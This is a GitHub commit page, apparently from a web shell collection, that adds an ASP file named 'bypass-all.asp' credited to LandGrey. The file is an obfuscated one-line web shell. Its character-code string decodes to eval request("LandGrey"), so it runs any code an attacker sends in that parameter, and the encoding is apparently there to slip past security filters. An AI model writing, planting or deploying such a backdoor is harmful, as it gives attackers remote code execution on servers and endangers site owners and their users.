Skip to content

Commit

Permalink
Create bypass-all.asp
Browse files Browse the repository at this point in the history
from : https://github.com/LandGrey
author : LandGrey
  • Loading branch information
tennc committed Jun 2, 2018
1 parent c8ee47f commit e872ddd
Showing 1 changed file with 9 additions and 0 deletions.
9 changes: 9 additions & 0 deletions asp/bypass-all.asp
@@ -0,0 +1,9 @@
<%<!--"-->
eXecUTe(fun("%167%184%163%174%98%180%167%179%183%167%181%182%106%100%142%163%176%166%137%180%167%187%100%107"))
Function fun(Str):
Str = Split(Str,"%")
For x=1 To Ubound(Str)
fun=fun&Chr(Str(x)-66)
Next
End Function
%>

0 comments on commit e872ddd

Please sign in to comment.